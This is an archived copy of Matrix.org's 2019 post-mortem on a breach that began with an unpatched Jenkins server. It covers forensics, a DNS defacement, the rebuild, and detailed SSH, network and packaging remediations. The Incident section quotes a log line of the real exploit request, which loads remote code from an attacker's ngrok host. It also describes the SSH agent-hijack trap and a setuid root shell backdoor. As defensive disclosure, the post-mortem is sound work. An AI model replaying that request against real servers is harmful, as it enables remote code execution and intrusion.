{
	"id": "af88d88e-faf2-4b87-a034-ef286a5ac0e0",
	"created_at": "2026-04-06T00:07:56.53816Z",
	"updated_at": "2026-04-10T03:35:21.353824Z",
	"deleted_at": null,
	"sha1_hash": "0c05a3841c348868350653525245f9c18e80ce88",
	"title": "Post-mortem and remediations for Apr 11 security incident",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 721505,
	"plain_text": "Post-mortem and remediations for Apr 11 security incident\r\nBy Matthew Hodgson\r\nPublished: 2019-05-08 · Archived: 2026-04-05 18:20:16 UTC\r\n🔗Table of contents\r\nIntroduction\r\nHistory\r\nThe Incident\r\nThe Defacement\r\nThe Rebuild\r\nRemediations\r\nSSH\r\nSSH agent forwarding should be disabled.\r\nSSH should not be exposed to the general internet\r\nSSH keys should give minimal access\r\nTwo factor authentication\r\nIt should be made as hard as possible to add malicious SSH keys\r\nChanges to SSH keys should be carefully monitored\r\nSSH config should be hardened, disabling unnecessary options\r\nNetwork architecture\r\nKeeping patched\r\nIntrusion detection\r\nIncident management\r\nConfiguration management\r\nAvoiding temporary measures which last forever\r\nSecure packaging\r\nDev and CI infrastructure\r\nLog minimisation and handling Personally Identifying Information (PII)\r\nConclusion\r\n🔗Introduction\r\nHi all,\r\nOn April 11th we dealt with a major security incident impacting the infrastructure which runs the Matrix.org homeserver -\r\nspecifically: removing an attacker who had gained superuser access to much of our production network. We provided\r\nupdates at the time as events unfolded on April 11 and 12 via Twitter and our blog, but in this post we’ll try to give a full\r\nanalysis of what happened and, critically, what we have done to avoid this happening again in future. Apologies that this has\r\ntaken several weeks to put together: the time-consuming process of rebuilding after the breach has had to take priority, and\r\nwe also wanted to get the key remediation work in place before writing up the post-mortem.\r\nFirstly, please understand that this incident was not due to issues in the Matrix protocol itself or the wider Matrix\r\nnetwork - and indeed everyone who wasn’t on the Matrix.org server should have barely noticed. 
If you see someone say\r\n“Matrix got hacked”, please politely but firmly explain to them that the servers which run the oldest and biggest instance got\r\ncompromised via a Jenkins vulnerability and bad ops practices, but the protocol and network itself was not impacted.\r\nThis is not to say that the Matrix protocol itself is bug free - indeed we are still in the process of exiting beta (delayed by this\r\nincident), but this incident was not related to the protocol.\r\nBefore we get stuck in, we would like to apologise unreservedly to everyone impacted by this whole incident. Matrix is an\r\naltruistic open source project, and our mission is to try to make the world a better place by providing a secure decentralised\r\ncommunication protocol and network for the benefit of everyone; giving users total control back over how they\r\ncommunicate online.\r\nIn this instance, our focus on trying to improve the protocol and network came at the expense of investing sysadmin time\r\naround the legacy Matrix.org homeserver and project infrastructure which we provide as a free public service to help\r\nbootstrap the Matrix ecosystem, and we paid the price.\r\nThis post will hopefully illustrate that we have learnt our lessons from this incident and will not be repeating them - and\r\nindeed intend to come out of this episode stronger than you can possibly imagine :)\r\nMeanwhile, if you think that the world needs Matrix, please consider supporting us via Patreon or Liberapay. Not only will\r\nthis make it easier for us to invest in our infrastructure in future, it also makes projects like Pantalaimon (E2EE\r\ncompatibility for all Matrix clients/bots) possible, which are effectively being financed entirely by donations. 
The funding\r\nhttps://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\r\nPage 1 of 10\n\nwe raised in Jan 2018 is not going to last forever, and we are currently looking into new longer-term funding approaches -\r\nfor which we need your support.\r\nFinally, if you happen across security issues in Matrix or matrix.org’s infrastructure, please please consider disclosing them\r\nresponsibly to us as per our Security Disclosure Policy, in order to help us improve our security while protecting our users.\r\n🔗History\r\nFirstly, some context about Matrix.org’s infrastructure. The public Matrix.org homeserver and its associated services runs\r\nacross roughly 30 hosts, spanning the actual homeserver, its DBs, load balancers, intranet services, website, bridges, bots,\r\nintegrations, video conferencing, CI, etc. We provide it as a free public service to the Matrix ecosystem to help bootstrap the\r\nnetwork and make life easier for first-time users.\r\nThe deployment which was compromised in this incident was mainly set up back in Aug 2017 when we vacated our\r\nprevious datacenter at short notice, thanks to our funding situation at the time. Previously we had been piggybacking on the\r\nwell-managed production datacenters of our previous employer, but during the exodus we needed to move as rapidly as\r\npossible, and so we span up a bunch of vanilla Debian boxes on UpCloud, and shifted over services as simply as we could.\r\nWe had no dedicated ops people on the project at that point, so this was a subset of the Synapse and Riot/Web dev teams\r\nputting on ops hats to rapidly get set up, whilst also juggling the daily fun of keeping the ever-growing Matrix.org server\r\nrunning and trying to actually develop and improve Matrix itself.\r\nIn practice, this meant that some corners were cut that we expected to be able to come back to and address once we had\r\ndedicated ops staff on the team. 
For instance, we skipped setting up a VPN for accessing production in favour of simply\r\nSSHing into the servers over the internet. We also went for the simplest possible config management system: checking all\r\nthe configs for the services into a private git repo. We also didn’t spend much time hardening the default Debian installations\r\n- for instance, the default image allows root access via SSH and allows SSH agent forwarding, and the config wasn’t\r\ntweaked. This is particularly unfortunate, given our previous production OS (a customised Debian variant) had got all these\r\nthings right - but the attitude was that because we’d got this right in the past, we’d be easily able to get it right in future once\r\nwe fixed up the hosts with proper configuration management etc.\r\nSeparately, we also made the controversial decision to maintain a public-facing Jenkins instance. We did this deliberately,\r\ndespite the risks associated with running a complicated publicly available service like Jenkins, but reasoned that as a FOSS\r\nproject, it is imperative that we are transparent and that continuous integration results and artefacts are available and directly\r\nvisible to all contributors - whether they are part of the core dev team or not. 
So we put Jenkins on its own host, gave it some\r\nmacOS build slaves, and resolved to keep an eye open for any security alerts which would require an upgrade.\r\nLots of stuff then happened over the following months - we secured funding in Jan 2018; the French Government began\r\ntalking about switching to Matrix around the same time; the pressure of getting Matrix (and Synapse and Riot) out of beta\r\nand to a stable 1.0 grew ever stronger; the challenge of handling the ever-increasing traffic on the Matrix.org server soaked\r\nup more and more time, and we started to see our first major security incidents (a major DDoS in March 2018, mitigated by\r\nshielding behind Cloudflare, and various attacks on the more beta bits of Matrix itself).\r\nThe good news was that funding meant that in March 2018 we were able to hire a fulltime ops specialist! By this point,\r\nhowever, we had two new critical projects in play to try to ensure long-term funding for the project via New Vector, the\r\nstartup formed in 2017 to hire the core team. Firstly, to build out Modular.im as a commercial-grade Matrix SaaS provider,\r\nand secondly, to support France in rolling out their massive Matrix deployment as a flagship example of how Matrix can be\r\nused. 
And so, for better or worse, the brand new ops team was given a very clear mandate: to largely ignore the legacy\r\ndatacenter infrastructure, and instead focus exclusively on building entirely new, pro-grade infrastructure for Modular.im\r\nand France, with the expectation of eventually migrating Matrix.org itself into Modular when ready (or just turning off the\r\nMatrix.org server entirely, once we have account portability).\r\nSo we ended up with two production environments; the legacy Matrix.org infra, whose shortcomings continued to linger and\r\nfester off the radar, and separately all the new Modular.im hosts, which are almost entirely operationally isolated from the\r\nlegacy datacenter; whose configuration is managed exclusively by Ansible, and have sensible SSH configs which disallow\r\nroot login etc. With 20:20 hindsight, the failure to prioritise hardening the legacy infrastructure is quite a good example of\r\nthe normalisation of deviance - we had gotten too used to the bad practices; all our attention was going elsewhere; and so we\r\nsimply failed to prioritise getting back to fix them.\r\n🔗The Incident\r\nThe first evidence of things going wrong was a tweet from JaikeySarraf, a security researcher who kindly reached out via\r\nDM at the end of Apr 9th to warn us that our Jenkins was outdated after stumbling across it via Google. In practice, our\r\nJenkins was running version 2.117 with plugins which had been updated on an adhoc basis, and we had indeed missed the\r\nsecurity advisory (partially because most of our CI pipelines had moved to TravisCI, CircleCI and Buildkite), and so on Apr\r\n10th we updated the Jenkins and investigated to see if any vulnerabilities had been exploited.\r\nIn this process, we spotted an unrecognised SSH key in /root/.ssh/authorized_keys2 on the Jenkins build server. 
This\r\nwas suspicious both due to the key not being in our key DB and the fact the key was stored in the obscure authorized_keys2 file (a legacy location from back when OpenSSH transitioned from SSH1-\u003eSSH2). Further inspection\r\nshowed that 19 hosts in total had the same key present in the same place.\r\nAt this point we started doing forensics to understand the scope of the attack and plan the response, as well as taking\r\nsnapshots of the hosts to protect data in case the attacker realised we were aware and attempted to vandalise or cover their\r\ntracks. Findings were:\r\nThe attacker had first compromised Jenkins on March 13th via an RCE vulnerability (CVE-2019-1003000 -\r\nhttps://www.exploit-db.com/exploits/46572):\r\nmatrix.org:443 151.34.xxx.xxx - - [13/Mar/2019:18:46:07 +0000] \"GET\r\n/jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?\r\nvalue=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27orange.tw%27,%20root=%27http://5f36xxxx.ngrok.io/jenkins/%27)%0A@Grab(gr\r\nHTTP/1.1\" 500 6083 \"-\" \"Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0\"\r\nThis allowed them to further compromise a Jenkins slave (Flywheel, an old Mac Pro used mainly for continuous\r\nintegration testing of Riot/iOS and Riot/Android). 
The attacker put an SSH key on the box, which was unfortunately\r\nexposed to the internet via a high-numbered SSH port for ease of admin by remote users, and placed a trap which\r\nwaited for any user to SSH into the jenkins user, which would then hijack any available forwarded SSH keys to try to\r\nadd the attacker’s SSH key to root@ on as many other hosts as possible.\r\nOn Apr 4th at 12:32 GMT, one of the Riot devops team members SSH’d into the Jenkins slave to perform some\r\nadmin, forwarding their SSH key for convenience for accessing other boxes while doing so. This triggered the trap,\r\nand resulted in the majority of the malicious keys being inserted to the remote hosts.\r\nFrom this point on, the attacker proceeded to explore the network, performing targeted exfiltration of data (e.g. our\r\npassbolt database, which is thankfully end-to-end encrypted via GPG) seemingly targeting credentials and data for\r\nuse in onward exploits, and installing backdoors for later use (e.g. a setuid root shell at /usr/share/bsd-mail/shroot ).\r\nThe majority of access to the hosts occurred between Apr 4th and 6th.\r\nThere was no evidence of large-scale data exfiltration, based on analysing network logs.\r\nThere was no evidence of Modular.im hosts having been compromised. 
(Modular’s provisioning system and DB did\r\nrun on the old infrastructure, but it was not used to tamper with the modular instances themselves).\r\nThere was no evidence of the identity server databases having been compromised.\r\nThere was no evidence of tampering in our source code repositories.\r\nThere was no evidence of tampering of our distributed software packages.\r\nTwo more hosts were compromised on Apr 5th by similarly hijacking another developer SSH agent as the dev logged\r\ninto a production server.\r\nBy around 2am on Apr 11th we felt that we had sufficient visibility on the attacker’s behaviour to be able to do a first pass at\r\nevicting them by locking down SSH, removing their keys, and blocking as much network traffic as we could.\r\nWe then started a full rebuild of the datacenter on the morning of Apr 11th, given that the only responsible course of action\r\nwhen an attacker has acquired root is to salt the earth and start over afresh. This meant rotating all secrets; isolating the old\r\nhosts entirely (including ones which appeared to not have been compromised, for safety), spinning up entirely new hosts,\r\nand redeploying everything from scratch with the fresh secrets. The process was significantly slowed down by colliding with\r\nunplanned maintenance and provisioning issues in the datacenter provider and unexpected delays spent waiting to copy data\r\nvolumes between datacenters, but by 1am on Apr 12th the core matrix.org server was back up, and we had enough of a\r\nwebsite up to publish the initial security incident blog post. (This was actually static HTML, faked by editing the generated\r\nWordPress content from the old website. 
We opted not to transition any WordPress deployments to the new infra, in a bid to\r\nkeep our attack surface as small as possible going forwards).\r\nGiven the production database had been accessed, we had no choice but to drop all access_tokens for matrix.org, to stop the\r\nattacker accessing user accounts, causing a forced logout for all users on the server. We also recommended all users change\r\ntheir passwords, given the salted \u0026 hashed (4096 rounds of bcrypt) passwords had likely been exfiltrated.\r\nAt about 4am we had enough of the bare necessities back up and running to pause for sleep.\r\n🔗The Defacement\r\nAt around 7am, we were woken up to the news that the attacker had managed to replace the matrix.org website with a\r\ndefacement (as per https://github.com/vector-im/riot-web/issues/9435). It looks like the attacker didn’t think we were being\r\ntransparent enough in our initial blog post, and wanted to make it very clear that they had access to many hosts, including\r\nthe production database, and had indeed exfiltrated password hashes. Unfortunately it took a few hours for the defacement to\r\nget on our radar as our monitoring infrastructure hadn’t yet been fully restored and the normal paging infrastructure wasn’t\r\nback up (we now have emergency-emergency-paging for this eventuality).\r\nOn inspection, it transpired that the attacker had not compromised the new infrastructure, but had used Cloudflare to repoint\r\nthe DNS for matrix.org to a defacement site hosted on Github. Now, as part of rotating the secrets which had been compromised via our configuration repositories, we had of course rotated the Cloudflare API key (used to automate changes\r\nto our DNS) during the rebuild on Apr 11. 
When you log into Cloudflare, it looks something like this...\r\n...where the top account is your personal one, and the bottom one is an admin role account. To rotate the admin API key, we\r\nclicked on the admin account to log in as the admin, and then went to the Profile menu, found the API keys and hit the\r\nChange API Key button.\r\nUnfortunately, when you do this, it turns out that the API Key it changes is your personal one, rather than the admin one. As\r\na result, in our rush we thought we’d rotated the admin API key, but we hadn’t, thus accidentally enabling the defacement.\r\nTo flush out the defacement we logged in directly as the admin user and changed the API key, pointed the DNS back at the\r\nright place, and continued on with the rebuild.\r\n🔗The Rebuild\r\nThe goal of the rebuild has been to get all the higher priority services back up rapidly - whilst also ensuring that good\r\nsecurity practices are in place going forwards. In practice, this meant making some immediate decisions about how to ensure\r\nthe new infrastructure did not suffer the same issues and fate as the old. Firstly, we ensured the most obvious mistakes that\r\nmade the breach possible were mitigated:\r\nAccess via SSH restricted as heavily as possible\r\nSSH agent forwarding disabled server-side\r\nAll configuration to be managed by Ansible, with secrets encrypted in vaults, rather than sitting in a git repo.\r\nThen, whilst reinstating services on the new infra, we opted to review everything being installed for security risks, replacing\r\nwith securer alternatives if needed, even if it slowed down the rebuild. Particularly, this meant:\r\nJenkins has been replaced by Buildkite\r\nWordpress has been replaced by static generated sites (e.g. 
Gatsby)\r\ncgit has been replaced by gitlab.\r\nEntirely new packaging building, signing \u0026 distribution infrastructure (more on that later)\r\netc.\r\nNow, while we restored the main synapse (homeserver), sydent (identity server), sygnal (push server), databases, load\r\nbalancers, intranet and website on Apr 11, it’s important to understand that there were over 100 other services running on the\r\ninfra - which is why it is taking a while to get full parity with where we were before.\r\nIn the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing\r\nservice list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:\r\n[service list table not preserved in this text capture]\r\nApologies again that it took longer to get some of these services back up than we’d preferred (and that there are still a few\r\npending). Once we got the top priority ones up, we had no choice but to juggle the remainder alongside remediation work,\r\nother security work, and actually working on Matrix(!), whilst ensuring that the services we restored were being restored\r\nsecurely.\r\n🔗Remediations\r\nOnce the majority of the P1 and P2 services had been restored, on Apr 24 we held a formal retrospective for the team on the\r\nwhole incident, which in turn kicked off a full security audit over the entirety of our infrastructure and operational processes.\r\nWe’d like to share the resulting remediation plan in as much detail as possible, in order to show the approach we are taking,\r\nand in case it helps others avoid repeating the mistakes of our past. Inevitably we’re going to have to skip over some of the\r\nitems, however - after all, remediations imply that there’s something that could be improved, and for obvious reasons we\r\ndon’t want to dig into areas where remediation work is still ongoing. 
We will aim to provide an update on these once\r\nongoing work is complete, however.\r\nWe should also acknowledge that after being removed from the infra, the attacker chose to file a set of Github issues on Apr\r\n12 to highlight some of the security issues that they had taken advantage of during the breach. Their actions matched the findings\r\nfrom our forensics on Apr 10, and their suggested remediations aligned with our plan.\r\nWe’ve split the remediation work into the following domains.\r\n🔗SSH\r\nSome of the biggest issues exposed by the security breach concerned our use of SSH, which we’ll take in turn:\r\n🔗SSH agent forwarding should be disabled.\r\nSSH agent forwarding is a beguilingly convenient mechanism which allows a user to ‘forward’ access to their private SSH\r\nkeys to a remote server whilst logged in, so they can in turn access other servers via SSH from that server. Typical uses are\r\nto make it easy to copy files between remote servers via scp or rsync, or to interact with an SCM system such as Github via\r\nSSH from a remote server. Your private SSH keys end up available for use by the server for as long as you are logged into it,\r\nletting the server impersonate you.\r\nThe common wisdom on this tends to be something like: “Only use agent forwarding when connecting to trusted hosts”. For\r\ninstance, Github’s guide to using SSH agent forwarding says:\r\nWarning: You may be tempted to use a wildcard like Host * to just apply this setting (ForwardAgent: yes) to\r\nall SSH connections. That's not really a good idea, as you'd be sharing your local SSH keys with every server you\r\nSSH into. They won't have direct access to the keys, but they will be able to use them as you while the connection\r\nis established. 
You should only add servers you trust and that you intend to use with agent forwarding\r\nAs a result, several of the team doing ops work had set Host *.matrix.org ForwardAgent: yes in their ssh client configs,\r\nthinking “well, what can we trust if not our own servers?”\r\nThis was a massive, massive mistake.\r\nIf there is one lesson everyone should learn from this whole mess, it is: SSH agent forwarding is incredibly unsafe, and in\r\ngeneral you should never use it. Not only can malicious code running on the server as that user (or root) hijack your\r\ncredentials, but your credentials can in turn be used to access hosts behind your network perimeter which might otherwise be\r\ninaccessible. All it takes is for someone to have snuck malicious code on your server waiting for you to log in with a forwarded\r\nagent, and boom, even if it was just a one-off ssh -A .\r\nOur remediations for this are:\r\nDisable all ssh agent forwarding on the servers.\r\nIf you need to jump through a box to ssh into another box, use ssh -J $host .\r\nThis can also be used with rsync via rsync -e \"ssh -J $host\"\r\nIf you need to copy files between machines, use rsync rather than scp (OpenSSH 8.0’s release notes explicitly\r\nrecommend using more modern protocols than scp).\r\nIf you need to regularly copy stuff from one server to another (or use SSH to GitHub to check out something from a\r\nprivate repo), it might be better to have a specific SSH ‘deploy key’ created for this, stored server-side and only able\r\nto perform limited actions.\r\nIf you just need to check out stuff from public git repos, use https rather than git+ssh.\r\nTry to educate everyone on the perils of SSH agent forwarding: if our past selves can’t be a good example, they can\r\nat least be a horrible warning...\r\nAnother approach could be to allow forwarding, but configure your SSH agent to prompt whenever a remote app tries to
However, not all agents support this (OpenSSH’s does via ssh-add -c , but gnome-keyring for instance\r\ndoesn’t), and also it might still be possible for a hijacker to race with the valid request to hijack your credentials.\r\n🔗SSH should not be exposed to the general internet\r\nNeedless to say, SSH is no longer exposed to the general internet. We are rolling out a VPN as the main access to dev\r\nnetwork, and then SSH bastion hosts to be the only access point into production, using SSH keys to restrict access to be as\r\nminimal as possible.\r\n🔗SSH keys should give minimal access\r\nAnother major problem factor was that individual SSH keys gave very broad access. We have gone through ensuring that\r\nSSH keys grant the least privilege required to the users in question. Particularly, root login should not be available over\r\nSSH.\r\nA typical scenario where users might end up with unnecessary access to production are developers who simply want to push\r\nnew code or check its logs. We are mitigating this by switching over to using continuous deployment infrastructure\r\neverywhere rather than developers having to actually SSH into production. For instance, the new matrix.org blog is\r\ncontinuously deployed into production by Buildkite from GitHub without anyone needing to SSH anywhere. Similarly, logs\r\nshould be available to developers from a logserver in real time, without having to SSH into the actual production host.\r\nWe’ve already been experimenting internally with sentry for this.\r\nRelatedly, we’ve also shifted to requiring multiple SSH keys per user (per device, and for privileged / unprivileged access),\r\nto have finer grained granularity over locking down their permissions and revoking them etc. 
(We had actually already\r\nstarted this process, and while it didn’t help prevent the attack, it did assist with forensics).\r\n🔗Two factor authentication\r\nWe are rolling out two-factor authentication for SSH to ensure that even if keys are compromised (e.g. via forwarding\r\nhijack), the attacker needs to have also compromised other physical tokens in order to successfully authenticate.\r\n🔗It should be made as hard as possible to add malicious SSH keys\r\nWe’ve decided to stop users from being able to directly manage their own SSH keys in production via\r\n~/.ssh/authorized_keys (or ~/.ssh/authorized_keys2 for that matter) - we can see no benefit from letting non-root\r\nusers set keys.\r\nInstead, keys for all accounts are managed exclusively by Ansible via /etc/ssh/authorized_keys/$account (using sshd’s\r\nAuthorizedKeysFile /etc/ssh/authorized_keys/%u directive).\r\n🔗Changes to SSH keys should be carefully monitored\r\nIf we’d had sufficient monitoring of the SSH configuration, the breach could have been caught instantly. We are doing this\r\nby managing the keys exclusively via Ansible, and also improving our intrusion detection in general.\r\nSimilarly, we are working on tracking changes and additions to other credentials (and enforcing their complexity).\r\n🔗SSH config should be hardened, disabling unnecessary options\r\nIf we’d gone through reviewing the default sshd config when we set up the datacenter in the first place, we’d have caught\r\nseveral of these failure modes at the outset. 
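Pulling the SSH remediations described here together, a hardened sshd_config fragment along these lines could enforce them server-side. This is purely illustrative (the option names are standard OpenSSH; the exact policy shown is our sketch, not the literal Matrix.org production config, and the 2FA line assumes a PAM-based second factor is installed):\r\n```\r\n# Illustrative hardened sshd_config fragment - a sketch, not the actual production config.\r\n# Close off the options implicated in the breach:\r\nPermitRootLogin no\r\nAllowAgentForwarding no\r\n# Keys come only from the centrally managed per-account files, never ~/.ssh:\r\nAuthorizedKeysFile /etc/ssh/authorized_keys/%u\r\n# Key + second factor (assumes a PAM 2FA module is configured); no passwords:\r\nPasswordAuthentication no\r\nChallengeResponseAuthentication yes\r\nAuthenticationMethods publickey,keyboard-interactive\r\n# Trim remaining surface area:\r\nX11Forwarding no\r\nPermitTunnel no\r\n```\r\nWith keys managed in one root-owned directory, a stray authorized_keys2 file like the attacker’s simply stops being consulted.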
We’ve now done so (as per above).\r\nWe’d like to recommend that packages of openssh start having secure-by-default configurations, as a number of the old\r\noptions just don’t need to exist on most newly provisioned machines.\r\n🔗Network architecture\r\nAs mentioned in the History section, the legacy network infrastructure effectively grew organically, without really having a\r\ncore network or a good split between different production environments.\r\nWe are addressing this by:\r\nSplitting our infrastructure into strictly separated service domains, which are firewalled from each other and can only\r\naccess each other via their respective ‘front doors’ (e.g. HTTPS APIs exposed at the loadbalancers).\r\nDevelopment\r\nIntranet\r\nPackage Build (airgapped; see below for more details)\r\nPackage Distribution\r\nProduction, which is in turn split per class of service.\r\nAccess to these networks will be via VPN + SSH jumpboxes (as per above). Access to the VPN is via per-device\r\ncertificate + 2FA, and SSH via keys as per above.\r\nSwitching to an improved internal VPN between hosts within a given network environment (i.e. we don’t trust the\r\ndatacenter LAN).\r\nWe’re also running most services in containers by default going forwards (previously it was a bit of a mix of running unix\r\nprocesses, VMs, and occasional containers), providing an additional level of namespace isolation.\r\n🔗Keeping patched\r\nNeedless to say, this particular breach would not have happened had we kept the public-facing Jenkins patched (although\r\nthere would of course still have been scope for a 0-day attack).\r\nGoing forwards, we are establishing a formal regular process for deploying security updates rather than relying on spotting\r\nsecurity advisories on an ad hoc basis. 
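On Debian-based hosts, one common way to sketch such a process is the unattended-upgrades package pinned to the security archive. This fragment is an illustrative example of the pattern, not a statement of our actual setup:\r\n```\r\n// Illustrative /etc/apt/apt.conf.d/50unattended-upgrades fragment\r\n// (Debian's unattended-upgrades package; not necessarily our exact policy).\r\nUnattended-Upgrade::Origins-Pattern {\r\n        "origin=Debian,codename=${distro_codename},label=Debian-Security";\r\n};\r\n// Apply security updates automatically, but surface what happened:\r\nUnattended-Upgrade::Mail "root";\r\nUnattended-Upgrade::Automatic-Reboot "false";\r\n```\r\nAutomatic patching covers the OS layer; anything self-hosted (like a Jenkins) still needs its advisories tracked explicitly.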
We are now also setting up regular vulnerability scans against production so we catch\r\nany gaps before attackers do.\r\nAside from our infrastructure, we’re also extending the process of regularly checking for security updates to also checking\r\nfor outdated dependencies in our distributed software (Riot, Synapse, etc), given that the discipline of regularly chasing\r\noutdated software applies equally to both.\r\nMoving all our machine deployment and configuration into Ansible allows this to be a much simpler task than before.\r\n🔗Intrusion detection\r\nThere’s obviously a lot we need to do in terms of spotting future attacks as rapidly as possible. Amongst other strategies,\r\nwe’re working on real-time log analysis for aberrant behaviour.\r\n🔗Incident management\r\nThere is much we have learnt from managing an incident at this scale. The main highlights taken from our internal\r\nretrospective are:\r\nThe need for a single incident manager to coordinate the technical response, prioritisation and\r\nhandover between those handling the incident. (We lacked a single incident manager at first, given several of the\r\nteam started off that week on holiday...)\r\nThe benefits of gathering all relevant info and checklists onto a canonical set of shared documents rather than being\r\nspread across different chatrooms and lost in scrollback.\r\nThe need to have an existing inventory of services and secrets available for tracking progress and prioritisation\r\nThe need to have a general incident management checklist for future reference, which folks can familiarise\r\nthemselves with ahead of time to avoid stuff getting forgotten. 
The sort of stuff which will go on our checklist in\r\nfuture includes:\r\nRemembering to appoint a named incident manager, external comms manager \u0026 internal comms manager.\r\n(They could of course be the same person, but the roles are distinct).\r\nEnsuring a sensible sequence of forensics, mitigations, communication, rotating secrets etc is followed, rather\r\nthan having to work it out on the fly and risk forgetting stuff\r\nRemembering to inform the ICO (Information Commissioner's Office) of any user data breaches\r\nGuidelines on how to balance between forensics and rebuilding (i.e. how long to spend on forensics, if at all,\r\nbefore pulling the plug)\r\nReminders to snapshot systems for forensics \u0026 backups\r\nReminder to not redesign infrastructure during a rebuild. There were a few instances where we lost time by\r\nseizing the opportunity to try to fix design flaws whilst rebuilding, some of which were avoidable.\r\nMaking sure that communication isn’t sent prematurely to users (e.g. we posted the blog post asking people to\r\nupdate their passwords before password reset had actually been restored - apologies for that.)\r\n🔗Configuration management\r\nOne of the major flaws once the attacker was in our network was that our internal configuration git repo was cloned on most\r\naccounts on most servers, containing within it a plethora of unencrypted secrets. Config would then get symlinked from the\r\ncheckout to wherever the app or OS needed it.\r\nThis is bad in terms of leaving unencrypted secrets (database passwords, API keys etc) lying around everywhere, but also in\r\nterms of making it harder to automatically maintain configuration and spot unauthorised configuration changes.\r\nOur solution is to switch all configuration management, from the OS upwards, to Ansible (which we had already established\r\nfor Modular.im), using Ansible vaults to store the encrypted secrets. 
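The vault pattern is worth spelling out, since it is what removes plaintext secrets from the repo. A minimal sketch, with hypothetical variable and file names chosen for illustration:\r\n```yaml\r\n# Sketch of an Ansible-vaulted secret (hypothetical names, e.g. group_vars/matrix/vault.yml).\r\n# A value encrypted inline with:\r\n#   ansible-vault encrypt_string 's3cret' --name 'synapse_db_password'\r\n# lands in the repo as ciphertext rather than plaintext:\r\nsynapse_db_password: !vault |\r\n          $ANSIBLE_VAULT;1.1;AES256\r\n          62313365...   # ciphertext elided\r\n```\r\nPlaybooks reference synapse_db_password like any other variable; Ansible decrypts it at deploy time given the vault password, so a cloned checkout on a compromised host yields only ciphertext.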
Frustratingly, we had already done the work for\r\nthis (and had even been giving talks at Ansible meetups about it!) but had not yet applied it to the legacy infrastructure.\r\n🔗Avoiding temporary measures which last forever\r\nNone of this would have happened had we been more disciplined in finishing off the temporary infrastructure from back in\r\n2017. As a general point, we should try and do it right the first time - and failing that, assign responsibility to someone to\r\nupdate it and assign responsibility to someone else to check. In other words, the only way to dig out of temporary measures\r\nlike this is to project manage the update or it will not happen. This is of course a general point not specific to this incident,\r\nbut one well worth reiterating.\r\n🔗Secure packaging\r\nOne of the most unfortunate mistakes highlighted by the breach is that the signing keys for the Synapse debian repository,\r\nRiot debian repository and Riot/Android releases on the Google Play Store had ended up on hosts which were compromised\r\nduring the attack. This is obviously a massive fail, and is a case of the geo-distributed dev teams prioritising the convenience\r\nof a near-automated release process without thinking through the security risks of storing keys on a production server.\r\nWhilst the keys were compromised, none of the packages that we distribute were tampered with. However, the impact on the\r\nproject has been high - particularly for Riot/Android, as we cannot allow the risk of an attacker using the keys to sign and\r\nsomehow distribute malicious variants of Riot/Android, and Google provides no means of recovering from a compromised\r\nsigning key beyond creating a whole new app and starting over. Therefore we have lost all our ratings, reviews and\r\ndownload counts on Riot/Android and started over. (If you want to give the newly released app a fighting chance despite this\r\nsetback, feel free to give it some stars on the Play Store). 
We also revoked the compromised Synapse \u0026 Riot GPG keys and\r\ncreated new ones (and published new instructions for how to securely set up your Synapse or Riot debian repos).\r\nIn terms of remediation, designing a secure build process is surprisingly hard, particularly for a geo-distributed team. What\r\nwe have landed on is as follows:\r\nDevelopers create a release branch to signify a new release (ensuring dependencies are pinned to known good\r\nversions).\r\nWe then perform all releases from a dedicated isolated release terminal.\r\nThis is a device which is kept disconnected from the internet, other than when doing a release, and even then\r\nit is firewalled to be able to pull data from SCM and push to the package distribution servers, but otherwise\r\nentirely isolated from the network.\r\nNeedless to say, the device is strictly used for nothing other than performing releases.\r\nThe build environment installation is scripted and installs on a fresh OS image (letting us easily build new\r\nrelease terminals as needed)\r\nThe signing keys (hardware or software) are kept exclusively on this device.\r\nThe publishing SSH keys (hardware or software) used to push to the packaging servers are kept exclusively\r\non this device.\r\nWe physically store the device securely.\r\nWe ensure someone on the team always has physical access to it in order to do emergency builds.\r\nMeanwhile, releases are distributed using dedicated infrastructure, entirely isolated from the rest of production.\r\nThese live at https://packages.matrix.org and https://packages.riot.im\r\nThese are minimal machines with nothing but a static web-server.\r\nThey are accessed only via the dedicated SSH keys stored on the release terminal.\r\nThese in turn can be mirrored in future to avoid a SPOF (or we could cheat and use Cloudflare’s always online\r\nfeature, for better or 
worse).\r\nAlternatives here included:\r\nIn an ideal world we’d do reproducible builds instead, and sign the build’s hash with a hardware key, but given we\r\ndon’t have reproducible builds yet this will have to suffice for now.\r\nWe could delegate building and distribution entirely to a 3rd party setup such as OBS (as per\r\nhttps://github.com/matrix-org/matrix.org/issues/370). However, we have a very wide range of artefacts to build\r\nacross many different platforms and OSes, so would rather build ourselves if we can.\r\n🔗Dev and CI infrastructure\r\nThe main change in our dev and CI infrastructure is to move from Jenkins to Buildkite. The latter has been serving us well\r\nfor Synapse builds over the last few months, and has now been extended to serve all the main CI pipelines that Jenkins was\r\nproviding. Buildkite works by orchestrating jobs on an elastic pool of CI workers we host in our own AWS, and so far has\r\ndone so quite painlessly.\r\nThe new pipelines have been set up so that where CI needs to push artefacts to production for continuous deployment (e.g.\r\nriot.im/develop), it does so by poking production via HTTPS to trigger production to pull the artefact from CI, rather than\r\npushing the artefact via SSH to production.\r\nOther than CI, our strategy is:\r\nContinue using GitHub for public repositories\r\nUse gitlab.matrix.org for private repositories (and stuff which we don’t want to re-export via the US, like Olm)\r\nContinue to host Docker images on Docker Hub (despite their recent security dramas).\r\n🔗Log minimisation and handling Personally Identifying Information (PII)\r\nAnother thing that the breach made painfully clear is that we log too much. While there’s not much evidence of the attacker\r\ngoing spelunking through any Matrix service log files, the fact is that whilst developing Matrix we’ve kept logging on\r\nmatrix.org relatively verbose to help with debugging. 
